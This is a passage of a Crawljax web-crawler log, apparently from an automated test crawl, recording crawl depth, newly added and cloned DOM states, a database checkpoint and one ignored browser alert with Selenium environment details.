com.crawljax.core.Crawler - Crawl depth is now 3 1280902 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state175 added to the StateMachine. 1280902 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1280912 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1283184 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1284395 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1285576 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1286878 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state176 added to the StateMachine. 1286878 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1286896 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1289152 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1290326 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1291504 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1292785 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state177 added to the StateMachine. 1292785 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1292795 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1295256 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1296443 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1297602 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1298848 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state178 added to the StateMachine. 1298848 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1298857 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1301174 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1302367 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1303557 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1304788 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state179 added to the StateMachine. 1304788 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1304797 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1307086 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1308283 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1309459 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1310686 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state180 and state143 are the same. 1310690 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1312964 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1314150 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1315330 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1316566 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state181 added to the StateMachine. 1316566 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1316583 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1318862 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1320052 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1321212 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1322462 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state182 and state110 are the same. 1322465 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1324794 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1325988 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1327183 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1328406 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state183 added to the StateMachine. 1328406 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1328422 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1330926 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1332129 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1333307 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1334532 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state184 added to the StateMachine. 1334533 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1334541 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1336941 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1338132 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1339299 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1340655 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state185 added to the StateMachine. 1340655 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1340664 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1342990 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1344197 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1345420 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1346675 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state186 added to the StateMachine. 1346675 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1346691 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1348952 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1350156 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1351464 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state187 added to the StateMachine. 1351464 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1351506 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1352753 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state188 and state116 are the same. 1352757 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1355026 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1356224 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1357421 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1358689 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state189 and state116 are the same. 1358693 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1361045 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1362243 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1363478 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1364731 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state190 added to the StateMachine. 1364731 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1364746 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1366998 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1368217 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1369401 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1370604 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state191 added to the StateMachine. 1370604 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1370616 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1372874 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1374081 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1375239 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1376482 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state192 added to the StateMachine. 1376482 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1376490 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1378735 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1379933 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1381171 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1382539 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state193 added to the StateMachine. 1382539 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1382557 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1384805 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1385947 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1387144 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1388517 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state194 and state37 are the same. 1388521 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1390732 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1391871 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1393075 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1394338 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state195 and state37 are the same. 1394342 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1396553 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1397703 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1399079 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state196 added to the StateMachine. 1399080 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1399105 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 37 states with unfired actions 1400366 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state197 added to the StateMachine. 1400366 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1400375 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 37 states with unfired actions 1402602 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1403758 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1405124 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1406388 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state198 added to the StateMachine. 1406388 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1406397 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 37 states with unfired actions 1408636 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1409784 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1411078 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1412386 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state199 and state14 are the same. 1412390 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 37 states with unfired actions 1414597 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1415748 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1416929 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1418174 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state200 and state99 are the same. 1418177 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1420396 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1421561 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1422737 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1424010 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state201 added to the StateMachine. 1424010 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1424020 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1426254 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1427401 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1428968 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state202 added to the StateMachine. 1428968 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1429082 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1431354 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1432515 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1433804 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1435350 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state203 added to the StateMachine. 1435350 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1435361 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1437642 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1438828 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1440138 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1441693 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state204 added to the StateMachine. 1441693 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1441703 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1444074 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1445222 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1446503 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1448054 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state205 added to the StateMachine. 1448054 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1448068 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1450326 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1451483 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1452779 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1454375 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state206 and state14 are the same. 1454379 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1457488 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1458625 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1459924 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1461574 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state207 added to the StateMachine. 1461574 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1461583 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1463788 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1464935 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1466259 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1468010 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state208 and state43 are the same. 1468014 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1470280 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1471434 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1472812 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1474398 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state209 and state96 are the same. 1474402 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1476640 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1477795 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1478995 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state210 added to the StateMachine. 1478995 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1479002 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 37 states with unfired actions 1480207 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state211 added to the StateMachine. 1480207 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1480215 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1482431 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1483573 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1484763 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1486048 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state212 added to the StateMachine. 1486048 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1486055 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 37 states with unfired actions 1487265 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state213 and state140 are the same. 1487278 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1489539 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1490699 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1491925 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1493124 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 4 1494410 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state214 and state73 are the same. 1494414 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1496640 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1497798 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1498999 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1500220 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state215 added to the StateMachine. 1500220 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1500230 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1502464 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1502596 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 1502596 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 1502603 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 1503198 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 1503204 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 1503713 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1504895 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1506118 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state216 added to the StateMachine. 1506118 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1506127 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1508354 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1509552 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1510837 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1512069 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state217 added to the StateMachine. 1512069 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1512091 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1514319 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1515460 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1516624 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1517871 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state218 added to the StateMachine. 1517871 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1517889 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1520124 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1521269 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1522431 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1523727 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state219 added to the StateMachine. 1523727 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1523754 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1526054 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1527201 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1528376 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1529797 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state220 and state181 are the same. 1529802 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1532049 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1533190 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1534379 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1535794 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state221 added to the StateMachine. 1535794 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1535805 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1538043 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1539186 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1540339 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1541588 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state222 added to the StateMachine. 1541588 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1541598 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1543897 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1545101 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1546280 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1547487 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state223 added to the StateMachine. 1547487 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1547496 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1549740 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1550900 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1552054 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1553291 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state224 added to the StateMachine. 1553291 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1553301 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1555546 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1556687 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1557837 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1559079 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state225 added to the StateMachine. 1559079 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1559089 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1560362 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Welcome Mr. textvalue): Welcome Mr. textvalue Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 1560402 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1562692 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1563842 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1565031 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state227 added to the StateMachine. 1565031 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1565037 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1566237 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state228 added to the StateMachine. 1566237 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1566246 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1568507 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1569652 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1570811 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1572081 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state229 added to the StateMachine. 1572081 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1572090 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1574340 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1575481 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1576649 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1577920 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state230 and state116 are the same. 1577925 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1580348 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1581511 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1582678 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1583943 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state231 and state190 are the same. 1583947 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1586378 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1587534 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1588694 [pool-2-thread-2] INFO com.crawljax.core.Crawler - 